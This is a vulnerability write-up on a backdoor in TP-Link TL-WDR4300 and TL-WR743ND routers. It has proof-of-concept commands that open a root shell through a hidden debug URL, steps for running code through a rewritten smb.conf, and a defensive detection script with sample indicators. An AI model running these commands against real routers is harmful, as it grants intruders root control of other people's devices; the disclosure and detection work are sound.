TP-Link Router Backdoor

Original article: http://sekurak.pl/tp-link-httptftp-backdoor

Affected versions

  • TL-WDR4300
  • TL-WR743ND (V1.2, V2.0)

Proof of concept

[code lang="bash"]
root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
--2013-03-09 23:22:31--  http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: "start_art.html"

    [ <=>                                   ] 426         --.-K/s   in 0s

2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

root@secu:~# nc 192.168.0.1 2222
ps
  PID  Uid     VmSize Stat Command
    1 root        404 S    init
    2 root            SW<  [kthreadd]
    3 root            SW<  [ksoftirqd/0]
    4 root            SW<  [events/0]
    5 root            SW<  [khelper]
    6 root            SW<  [async/mgr]
    7 root            SW<  [kblockd/0]
    8 root            SW   [pdflush]
    9 root            SW   [pdflush]
   10 root            SW<  [kswapd0]
   17 root            SW<  [mtdblockd]
   18 root            SW<  [unlzma/0]
   71 root       2768 S    /usr/bin/httpd
   76 root        380 S    /sbin/getty ttyS0 115200
   78 root        208 S    ipcserver
   82 root       2768 S    /usr/bin/httpd
   83 root       2768 S    /usr/bin/httpd
   86 root        732 S    ushare -d -x -f /tmp/ushare.conf
   92 root        348 S    syslogd -C -l 7
   96 root        292 S    klogd
  101 root            SW<  [napt_ct_scan]
  246 root        348 S    /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
  247 root        204 S    /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
  251 root        364 S    /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
  286 root       2768 S    /usr/bin/httpd
  299 root       2768 S    /usr/bin/httpd
  300 root       2768 S    /usr/bin/httpd
  305 root       2768 S    /usr/bin/httpd
  307 root       2768 S    /usr/bin/httpd
  309 root       2768 S    /usr/bin/httpd
  310 root       2768 S    /usr/bin/httpd
  389 root       2768 S    /usr/bin/httpd
[/code]

Details

The following HTTP request is sent: http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html

The router then downloads a file (nart.out) from the host that issued the HTTP request and executes it as root:

[image: tp-link-diag]

The HTTP request as captured from the host:

[image: wireshark_tmp]

The Wireshark filter used to display the router's TFTP traffic:

[image: wireshark1]

The TFTP request for nart.out:

[image: ftp1]

The router also supports sharing files from USB storage over FTP:

[image: ftp2]

The upload path is then modified with Burp Suite:

[image: ftp3]

Browsing the /tmp directory shows that /tmp/samba/smb.conf is writable:

[image: ftp5]

smb.conf is modified so that it executes the /tmp/szel file uploaded earlier; this is the path that was rewritten in the request captured with Burp Suite:

[image: http-server]

In the httpd module, the code that handles start_art.html is found; it calls tftp.

So when start_art.html is accessed, the router copies nart.out from the host (192.168.1.100), runs chmod 777 on it and executes it.
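From a defender's point of view, the writeup above gives two observables: a request for the debug URL on the router's web interface, and the router itself issuing a TFTP read request for nart.out to a LAN host. The following Python script is an added example (not code from the original article or from sekurak) that decodes TFTP read-request packets and scans HTTP access-log lines for both indicators. The log lines and packet bytes are constructed for the example, and matching any numeric suffix after userRpmNatDebugRpm is an assumption made here, not something the article states.

```python
import re
import struct

# Indicators from the writeup above: the debug URL and the TFTP filename.
# Assumption of this example: the numeric suffix is matched generically.
DEBUG_PATH_RE = re.compile(r"/userRpmNatDebugRpm\d+/start_art\.html", re.IGNORECASE)
SUSPICIOUS_TFTP_FILES = {"nart.out"}

TFTP_RRQ = 1   # TFTP read-request opcode (RFC 1350)
TFTP_MODES = ("netascii", "octet", "mail")


def parse_tftp_rrq(payload: bytes):
    """Decode a TFTP read request (opcode 1, filename NUL mode NUL).

    Returns (filename, mode), or None if the payload is not a well-formed RRQ.
    Write requests, data, acks and errors are all rejected here.
    """
    if len(payload) < 4:
        return None
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode != TFTP_RRQ:
        return None
    fields = payload[2:].split(b"\x00")
    if len(fields) < 3:           # need filename, mode and the terminating NUL
        return None
    try:
        filename = fields[0].decode("ascii")
        mode = fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        return None
    if not filename or mode not in TFTP_MODES:
        return None
    return filename, mode


def tftp_alert(src_ip: str, dst_ip: str, payload: bytes):
    """Alert when a device asks a LAN host for one of the known filenames."""
    rrq = parse_tftp_rrq(payload)
    if rrq is None:
        return None
    filename, _ = rrq
    if filename.rsplit("/", 1)[-1].lower() in SUSPICIOUS_TFTP_FILES:
        return f"TFTP: {src_ip} requested {filename} from {dst_ip}"
    return None


def http_alert(line: str):
    """Alert when an access-log line shows a request for the debug page."""
    m = DEBUG_PATH_RE.search(line)
    if m is None:
        return None
    return f"HTTP: debug page {m.group(0)} requested: {line.strip()}"


def scan(http_lines, tftp_packets):
    """Run both detectors; returns the list of alert strings."""
    alerts = [a for a in map(http_alert, http_lines) if a]
    alerts += [a for a in (tftp_alert(*p) for p in tftp_packets) if a]
    return alerts


# Constructed sample data (not captured from a real device).
SAMPLE_HTTP_LINES = [
    '192.168.0.100 - - [09/Mar/2013:23:22:31 +0100] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 200 426',
    '192.168.0.100 - - [09/Mar/2013:23:20:05 +0100] "GET /userRpm/StatusRpm.htm HTTP/1.1" 200 1532',
]
SAMPLE_TFTP_PACKETS = [
    # (source IP, destination IP, UDP payload)
    ("192.168.0.1", "192.168.0.100", b"\x00\x01nart.out\x00octet\x00"),    # router pulls nart.out
    ("192.168.0.50", "192.168.0.10", b"\x00\x01pxelinux.0\x00octet\x00"),  # ordinary PXE boot
    ("192.168.0.1", "192.168.0.100", b"\x00\x02nart.out\x00octet\x00"),    # WRQ, not a read
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_HTTP_LINES, SAMPLE_TFTP_PACKETS):
        print(alert)
```

The TFTP side is the more reliable signal: an embedded router has no business opening a TFTP read request towards a client on its own LAN, so the parser rejects everything except a well-formed RRQ and then only looks at the filename, while the HTTP side depends on having a proxy or IDS in front of the router that records the request path.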
